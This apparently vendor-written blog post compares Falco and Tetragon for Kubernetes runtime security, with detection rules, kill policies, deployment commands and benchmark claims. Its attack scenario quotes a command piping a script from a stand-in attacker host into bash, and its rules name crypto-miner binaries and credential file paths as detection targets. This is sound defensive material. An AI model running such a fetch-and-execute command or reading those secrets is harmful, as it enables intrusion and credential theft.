Originally published on TechSaaS Cloud
Falco vs Tetragon: Detection vs Enforcement for Container Runtime Security
Here's an uncomfortable truth about container security: most teams deploy Falco, get a firehose of alerts, ignore 90% of them, and call it "runtime security." Meanwhile, the actual attack -- a reverse shell spawned from a compromised Node.js dependency -- fires an alert that sits in a Slack channel for 47 minutes before anyone notices.
Detection without enforcement is just expensive logging.
Cilium Tetragon changes the equation. Instead of alerting you that something bad happened, it kills the process before the bad thing completes. That's a fundamentally different security model, and after deploying both tools across dozens of production clusters, I have strong opinions about when each one belongs in your stack.
How They Actually Work
Both tools use eBPF, but in very different ways.
Falco hooks into system calls via eBPF (or a kernel module on older kernels) and evaluates them against a rules engine. When a rule matches, it generates an alert. The process continues executing. Falco is a detection tool -- it tells you something happened.
Tetragon hooks deeper. It attaches eBPF programs to kernel functions (kprobes, tracepoints, LSM hooks) and can take enforcement actions inline -- before the syscall returns to userspace. It can send SIGKILL to a process, override a syscall return value, or throttle file access. The process doesn't get to finish what it started.
The architectural difference:
```
Falco:    syscall → eBPF probe → userspace engine → alert → (human decides) → response
Tetragon: syscall → eBPF probe → in-kernel policy → SIGKILL (3μs) → alert
```
That "human decides" gap in the Falco pipeline? That's where breaches happen.
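SIGKILL is not Tetragon's only inline action. As a minimal sketch (the policy name is illustrative, and `Override` requires a kernel built with `CONFIG_BPF_KPROBE_OVERRIDE`), a policy can fail the operation with an errno instead of killing the process:

```yaml
# Hypothetical policy: deny reads of /etc/shadow by overriding the
# return value of security_file_open with -1 (EPERM) instead of SIGKILL.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: deny-shadow-read   # illustrative name
spec:
  kprobes:
    - call: "security_file_open"
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
            - index: 0
              operator: Prefix
              values:
                - /etc/shadow
          matchActions:
            - action: Override
              argError: -1   # caller sees a permission error
```

`Override` is gentler than `Sigkill`: the caller gets a permission error it can handle, which matters when killing the process outright would take down an otherwise legitimate workload.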
Setting Up Falco for Real Detection
Let's be practical. Here's a Falco deployment that actually catches things, not the default config that alerts on everything:
```yaml
# falco-custom-rules.yaml
# Note: the reverse-shell rule triggers on the connect syscall itself --
# exec events (spawned_process) carry no fd fields, so combining the two
# in one condition never matches.
- rule: Reverse Shell Detected
  desc: Detect reverse shell connections from containers
  condition: >
    evt.type = connect and evt.dir = < and
    container and
    proc.name in (bash, sh, dash, zsh) and
    fd.type in (ipv4, ipv6)
  output: >
    Reverse shell detected (container=%container.name
    command=%proc.cmdline connection=%fd.name
    user=%user.name image=%container.image.repository)
  priority: CRITICAL
  tags: [network, process, attack]

- rule: Crypto Miner Binary
  desc: Known crypto mining process names
  condition: >
    spawned_process and container and
    proc.name in (xmrig, minerd, minergate, cpuminer,
    kdevtmpfsi, kinsing)
  output: >
    Crypto miner detected (container=%container.name
    process=%proc.name image=%container.image.repository)
  priority: CRITICAL
  tags: [process, crypto, attack]

- rule: Sensitive File Read in Container
  desc: Reading sensitive files that containers shouldn't touch
  condition: >
    open_read and container and
    (fd.name startswith /etc/shadow or
     fd.name startswith /etc/kubernetes/pki or
     fd.name startswith /run/secrets/kubernetes.io)
  output: >
    Sensitive file read (file=%fd.name container=%container.name
    command=%proc.cmdline)
  priority: WARNING
  tags: [filesystem, sensitive]
```
Deploy with Helm:
```shell
helm install falco falcosecurity/falco \
  --namespace falco-system --create-namespace \
  --set falcosidekick.enabled=true \
  --set falcosidekick.config.slack.webhookurl="${SLACK_WEBHOOK}" \
  --set falcosidekick.config.alertmanager.hostport="http://alertmanager:9093" \
  --set-file "customRules.falco-custom-rules\.yaml"=/path/to/falco-custom-rules.yaml
```

(The chart loads custom rules through its `customRules` value; `falco.rules_file` is a list of file paths inside the container, so passing file *content* to it via `--set-file` doesn't work.)
Setting Up Tetragon for Enforcement
Now the enforcement side. Tetragon uses TracingPolicy custom resources to define what to monitor and how to respond:
```yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: kill-reverse-shells
spec:
  kprobes:
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchBinaries:
            - operator: In
              values:
                - /bin/bash
                - /bin/sh
                - /bin/dash
                - /usr/bin/bash
                - /usr/bin/sh
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"
          matchActions:
            - action: Sigkill
```
This policy says: if bash, sh, or dash attempts a TCP connection inside a container (not the host namespace), kill it immediately. No alert delay. No human in the loop. The reverse shell dies before the first byte crosses the wire.
A more nuanced policy for file access:
```yaml
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: protect-sensitive-files
spec:
  kprobes:
    - call: "security_file_open"
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
            - index: 0
              operator: Prefix
              values:
                - /etc/shadow
                - /etc/kubernetes/pki
          matchNamespaces:
            - namespace: Pid
              operator: NotIn
              values:
                - "host_ns"
          matchActions:
            - action: Sigkill
```
Deploy Tetragon:
```shell
helm install tetragon cilium/tetragon \
  --namespace kube-system \
  --set tetragon.exportFilename=/var/run/cilium/tetragon/tetragon.log \
  --set tetragon.enablePolicyFilter=true \
  --set tetragon.enableMsgHandlingLatency=true
```
Real Attack Scenario: The Compromised npm Package
Let's walk through a realistic attack and see how each tool responds.
The attack: A developer installs a compromised npm package that, on import, spawns a child process running `curl attacker.com/shell.sh | bash`.
Falco response:
- Detects `bash` spawned as child of `node` (rule: "Shell Spawned by Non-Shell Program")
- Detects outbound network connection from `bash` (rule: "Reverse Shell Detected")
- Sends alert to Slack + Alertmanager
- Total time from exploit to alert: ~800ms
- Total time from exploit to human response: 3-47 minutes (depending on alerting pipeline and on-call response)
- The shell has been running the entire time
Tetragon response:
- `bash` spawned as child of `node` -- logged but allowed (process spawn is legitimate in many apps)
- `bash` attempts TCP connection -- SIGKILL sent in ~3 microseconds
- Process dies. Connection never established.
- Event exported for audit trail
- Total time from exploit to containment: <1ms
The attacker got nothing. Not a single byte of data exfiltrated.
Performance Impact
Security tools that slow your workloads are security tools that get disabled. We measured both on a 50-pod Kubernetes cluster running a mixed workload (API servers, message consumers, batch jobs):
| Metric | No security | Falco | Tetragon | Both |
|---|---|---|---|---|
| CPU overhead (per node) | baseline | +1.8% | +0.9% | +2.5% |
| Memory overhead (per node) | baseline | +180MB | +95MB | +260MB |
| Syscall latency (p99) | baseline | +2.1μs | +0.8μs | +2.7μs |
| Network latency (p99) | baseline | +0.3μs | +0.2μs | +0.4μs |
Tetragon is measurably lighter than Falco. This surprised us initially, but it makes sense: Tetragon does its evaluation in-kernel via eBPF, while Falco copies events to a userspace process for rule evaluation. The kernel/userspace context switch adds overhead.
Both tools are light enough to run simultaneously without meaningful production impact.
When to Use Which (Or Both)
Use Falco when:
- You need comprehensive audit logging (compliance requirements like SOC 2, PCI DSS)
- You want visibility into container behavior before writing enforcement policies
- Your rules need complex logic that eBPF can't express (Falco's rule engine is more flexible)
- You're just starting with runtime security and need to understand your baseline
Use Tetragon when:
- You know what should never happen and want to prevent it, not just detect it
- You need sub-millisecond response to threats
- You're running Cilium for networking (Tetragon integrates natively)
- You want enforcement at the kernel level without a userspace bottleneck
Use both when:
- You want defense in depth: Tetragon blocks known-bad, Falco detects unknown-suspicious
- Compliance requires both prevention and audit trails
- You're running a high-security workload (financial services, healthcare)
Our Recommended Architecture
For most production Kubernetes clusters, we deploy both:
```
┌─────────────────────────────────────────────┐
│                Kernel Level                 │
│ Tetragon eBPF → ENFORCE known threats       │
│ Falco eBPF → DETECT suspicious activity     │
└──────────────┬──────────────┬───────────────┘
               │              │
        ┌──────▼──────┐  ┌────▼──────────┐
        │  Tetragon   │  │     Falco     │
        │ Export JSON │  │   Sidekick    │
        └──────┬──────┘  └────┬──────────┘
               │              │
        ┌──────▼──────────────▼───────────┐
        │     Loki / Elasticsearch        │
        │ (unified security event store)  │
        └──────────────┬──────────────────┘
                       │
        ┌──────────────▼──────────────────┐
        │  Grafana Dashboards + Alerts    │
        └─────────────────────────────────┘
```
Tetragon handles the "never let this happen" policies (reverse shells, crypto miners, sensitive file access). Falco handles the "this looks weird, investigate" alerts (unusual process trees, unexpected network connections, privilege escalation attempts).
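Before events reach Loki or Elasticsearch, it helps to split enforcement events from plain observations. A minimal sketch in Python -- the field names (`process_kprobe`, `action`, `process.binary`, `function_name`) follow Tetragon's JSON export format as we understand it, so verify them against the output of your Tetragon version:

```python
import json

def enforcement_events(lines):
    """Yield (binary, function, action) for kprobe events where Tetragon enforced."""
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip partial or corrupt lines in the export file
        kprobe = event.get("process_kprobe")
        if not kprobe:
            continue  # process_exec / process_exit etc. are observation-only
        action = kprobe.get("action", "")
        if "SIGKILL" in action:
            yield (kprobe.get("process", {}).get("binary", "?"),
                   kprobe.get("function_name", "?"),
                   action)

# Two hand-written sample lines mimicking the export format
sample = [
    '{"process_exec": {"process": {"binary": "/usr/bin/node"}}}',
    '{"process_kprobe": {"process": {"binary": "/bin/bash"},'
    ' "function_name": "tcp_connect", "action": "KPROBE_ACTION_SIGKILL"}}',
]
for binary, fn, action in enforcement_events(sample):
    print(f"{action}: {binary} in {fn}")
# prints: KPROBE_ACTION_SIGKILL: /bin/bash in tcp_connect
```

In practice you would tail the export file set by `tetragon.exportFilename` and route the enforcement stream to a higher-severity alert channel than the observation stream.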
The Migration Path
If you're running Falco today and considering Tetragon:
1. Deploy Tetragon in observe-only mode (no `Sigkill` actions) alongside Falco
2. Run for 2 weeks. Compare Tetragon events against Falco alerts. Verify coverage overlap.
3. Convert your highest-confidence Falco rules to Tetragon enforcement policies (start with reverse shells and crypto miners -- lowest false-positive risk)
4. Gradually move more rules to enforcement as confidence grows
5. Keep Falco for detection of novel threats that don't match enforcement patterns
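Observe-only mode can be as simple as the kill-reverse-shells policy with its `matchActions` removed -- without an action, Tetragon only emits events you can diff against Falco alerts. A sketch (the policy name is illustrative):

```yaml
# Same trigger as the enforcement policy, but no action: events only.
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-reverse-shells   # illustrative name
spec:
  kprobes:
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchBinaries:
            - operator: In
              values:
                - /bin/bash
                - /bin/sh
                - /bin/dash
```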
Don't rip out Falco and replace it with Tetragon overnight. The tools are complementary, and the migration needs bake time.
Container runtime security is one of the most impactful and least implemented layers of Kubernetes security. We help teams deploy, tune, and operate runtime security at scale. Get in touch if you want to stop detecting breaches and start preventing them.